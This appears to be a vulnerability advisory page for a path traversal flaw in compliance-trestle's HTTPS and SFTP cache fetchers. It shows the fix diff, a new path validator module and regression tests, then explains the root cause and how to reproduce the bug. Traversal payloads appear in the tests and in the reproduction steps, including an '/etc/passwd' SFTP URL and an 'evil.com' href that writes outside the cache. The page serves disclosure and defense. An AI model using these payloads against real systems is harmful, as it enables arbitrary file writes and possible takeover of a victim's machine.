    +
    +    def test_attack_vector_sftp_private_network(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of SFTP path traversal to system files."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: SFTP to internal host with path traversal
    +        evil_url = 'sftp://192.168.1.1/../../../../../../../etc/passwd'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, evil_url)
    +
    +
    +# Made with Bob
    
  • trestle/core/remote/cache.py+30 4 modified
    @@ -41,6 +41,7 @@
     from trestle.common.err import TrestleError
     from trestle.core import parser
     from trestle.core.base_model import OscalBaseModel
    +from trestle.core.remote.security import PathSecurityValidator
     
     logger = logging.getLogger(__name__)
     
    @@ -258,13 +259,26 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
                 )
             if u.hostname is None:
                 raise TrestleError(f'Cache request for {self._uri} requires hostname')
    +
    +        # Validate the URL path to prevent path traversal attacks
    +        PathSecurityValidator.validate_url_path_for_cache(u.path)
    +
             https_cached_dir = self._trestle_cache_path / u.hostname
    -        # Skip any number of back- or forward slashes preceding the URI path (u.path)
    -        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
    +
    +        # Skip any number of back- or forward slashes preceding the URI path
    +        match = re.search('[^/\\\\]', u.path)
    +        if match:
    +            path_parent = pathlib.Path(u.path[match.span()[0] :]).parent
    +        else:
    +            path_parent = pathlib.Path('.')
    +
             https_cached_dir = https_cached_dir / path_parent
             https_cached_dir.mkdir(parents=True, exist_ok=True)
             self._cached_object_path = https_cached_dir / pathlib.Path(pathlib.Path(u.path).name)
     
    +        # Validate that the resolved cache path stays within the cache directory (defense in depth)
    +        PathSecurityValidator.validate_cache_path(self._cached_object_path, self._trestle_cache_path)
    +
         def _do_fetch(self) -> None:
             auth = None
             verify = None
    @@ -325,13 +339,25 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
                 logger.warning(f'Malformed URI, cannot parse path in URL {self._uri}')
                 raise TrestleError(f'Cache request for invalid input URI: missing file path {self._uri}')
     
    +        # Validate the URL path to prevent path traversal attacks
    +        PathSecurityValidator.validate_url_path_for_cache(u.path)
    +
             sftp_cached_dir = self._trestle_cache_path / u.hostname
    -        # Skip any number of back- or forward slashes preceding the URL path (u.path)
    -        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
    +
    +        # Skip any number of back- or forward slashes preceding the URL path
    +        match = re.search('[^/\\\\]', u.path)
    +        if match:
    +            path_parent = pathlib.Path(u.path[match.span()[0] :]).parent
    +        else:
    +            path_parent = pathlib.Path('.')
    +
             sftp_cached_dir = sftp_cached_dir / path_parent
             sftp_cached_dir.mkdir(parents=True, exist_ok=True)
             self._cached_object_path = sftp_cached_dir / pathlib.Path(pathlib.Path(u.path).name)
     
    +        # Validate that the resolved cache path stays within the cache directory (defense in depth)
    +        PathSecurityValidator.validate_cache_path(self._cached_object_path, self._trestle_cache_path)
    +
         def _do_fetch(self) -> None:
             """Fetch remote object and update the cache if appropriate and possible to do so.
     
    
  • trestle/core/remote/security.py+98 0 added
    @@ -0,0 +1,98 @@
    +# -*- mode:python; coding:utf-8 -*-
    +
    +# Copyright (c) 2026 The OSCAL Compass Authors.
    +#
    +# Licensed under the Apache License, Version 2.0 (the "License");
    +# you may not use this file except in compliance with the License.
    +# You may obtain a copy of the License at
    +#
    +#     https://www.apache.org/licenses/LICENSE-2.0
    +#
    +# Unless required by applicable law or agreed to in writing, software
    +# distributed under the License is distributed on an "AS IS" BASIS,
    +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    +# See the License for the specific language governing permissions and
    +# limitations under the License.
    +"""
    +Security utilities for remote fetching operations.
    +
    +Provides path validation to prevent path traversal attacks.
    +"""
    +
    +import logging
    +import pathlib
    +
    +from trestle.common.err import TrestleError
    +
    +logger = logging.getLogger(__name__)
    +
    +
    +class PathSecurityValidator:
    +    """Validator for ensuring file paths remain within allowed boundaries."""
    +
    +    @staticmethod
    +    def validate_url_path_for_cache(url_path: str) -> None:
    +        """
    +        Validate a URL path component to prevent path traversal attacks.
    +
    +        Detects path traversal attempts (..) and raises an exception to block the attack.
    +        This prevents directory traversal attacks when constructing cache file paths.
    +
    +        Args:
    +            url_path: The path component from a URL (e.g., from urlparse().path)
    +
    +        Raises:
    +            TrestleError: If path contains traversal sequences (..)
    +
    +        Example:
    +            >>> PathSecurityValidator.validate_url_path_for_cache('/normal/path.json')  # No exception
    +            >>> PathSecurityValidator.validate_url_path_for_cache('/../../../etc/passwd')  # Raises TrestleError
    +        """
    +        # Check for path traversal sequences
    +        if '..' in url_path:
    +            raise TrestleError(
    +                f'Security violation: Path traversal blocked. '
    +                f'URL path "{url_path}" contains ".." sequences which could '
    +                f'allow writing files outside the cache directory.'
    +            )
    +
    +    @staticmethod
    +    def validate_cache_path(cache_path: pathlib.Path, cache_root: pathlib.Path) -> None:
    +        """
    +        Validate that a cache file path stays within the cache directory.
    +
    +        Uses path resolution and relative_to() to ensure the resolved cache path
    +        is actually within the cache root directory, preventing path traversal attacks.
    +
    +        Args:
    +            cache_path: The proposed cache file path to validate
    +            cache_root: The root cache directory that must contain the cache_path
    +
    +        Raises:
    +            TrestleError: If cache_path resolves outside cache_root
    +
    +        Example:
    +            >>> cache_root = pathlib.Path('/home/user/.trestle/cache')
    +            >>> cache_path = cache_root / 'evil.com' / '..' / '..' / 'etc' / 'passwd'
    +            >>> validate_cache_path(cache_path, cache_root)  # Raises TrestleError
    +        """
    +        # Resolve both paths to absolute, normalized paths
    +        resolved_cache = cache_path.resolve()
    +        resolved_root = cache_root.resolve()
    +
    +        try:
    +            # Check if cache path is relative to (within) cache root
    +            resolved_cache.relative_to(resolved_root)
    +
    +        except ValueError as e:
    +            # relative_to() raises ValueError if path is not relative to root
    +            raise TrestleError(
    +                f'Security violation: Cache path traversal blocked. '
    +                f'Attempted to write to "{resolved_cache}" which is outside '
    +                f'the cache directory "{resolved_root}"'
    +            ) from e
    +        except Exception as e:
    +            raise TrestleError(f'Error validating cache path "{cache_path}": {e}') from e
    +
    +
    +# Made with Bob
    

Vulnerability mechanics

Root cause

"Missing sanitization of `../` path traversal sequences from the URL path component when constructing the local cache file path, combined with no boundary check on the resolved path."

Attack vector

An attacker crafts a malicious OSCAL profile whose `imports` section contains an `href` URL with path traversal sequences (e.g., `https://evil.com/../../../../../../../tmp/pwned.json`) [ref_id=1][ref_id=2]. When compliance-trestle fetches this remote profile, `HTTPSFetcher` (or `SFTPFetcher`) constructs the cache path by concatenating the cache directory with the hostname and the unsanitized URL path [ref_id=1]. The `../` sequences resolve outside the intended cache directory, and `mkdir(parents=True, exist_ok=True)` creates the intermediate directories [ref_id=1]. The attacker-controlled HTTP response body is then written to the traversed path via `write_text()` [ref_id=1]. This enables arbitrary file write, which can be escalated to remote code execution by overwriting cron jobs, SSH authorized keys, or configuration files [ref_id=1][ref_id=2].

Affected code

The vulnerability resides in `trestle/core/remote/cache.py` in both `HTTPSFetcher.__init__` (lines 259-266) and `SFTPFetcher.__init__` (lines 328-333) [ref_id=1][ref_id=2]. The URL path component from `urlparse()` is used directly to construct the local cache file path without sanitizing `../` sequences, and no boundary check (e.g., `is_relative_to()`) is performed on the resolved path [ref_id=1].

What the fix does

The patch introduces a new module `trestle/core/remote/security.py` containing `PathSecurityValidator` with two static methods [patch_id=2797568]. `validate_url_path_for_cache()` checks whether the URL path contains `..` and raises `TrestleError` if so, blocking traversal at the path-string level [patch_id=2797568]. `validate_cache_path()` resolves both the constructed cache path and the cache root, then uses `relative_to()` to confirm the cache path stays within the cache directory, providing defense-in-depth [patch_id=2797568]. Both `HTTPSFetcher` and `SFTPFetcher` call these validators in their `__init__` methods before creating directories or writing files [patch_id=2797568]. The same fix is backported to the v3 branch in a separate commit [patch_id=2797569].

Preconditions

  • inputThe attacker must control a remote OSCAL profile that the victim's compliance-trestle instance will fetch (e.g., via an imports href)
  • configThe victim must run compliance-trestle with a version prior to the fix (e.g., v4.0.2) and the tool must process the malicious profile
  • networkThe attacker's server must be reachable from the victim's machine and must respond with attacker-controlled content

Reproduction

Install the vulnerable version: `pip install compliance-trestle==4.0.2`. Create a malicious OSCAL profile (e.g., `malicious_profile.yaml`) with an imports href containing path traversal: `href: "https://evil.com/../../../../../../../tmp/trestle_pwned.json"` [ref_id=1][ref_id=2]. Run compliance-trestle to process this profile. The file will be written to `/tmp/trestle_pwned.json` with the attacker-controlled HTTP response body [ref_id=1]. A standalone Python simulation script is also provided in the advisory that reproduces the exact cache path construction logic and demonstrates the traversal [ref_id=1].

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.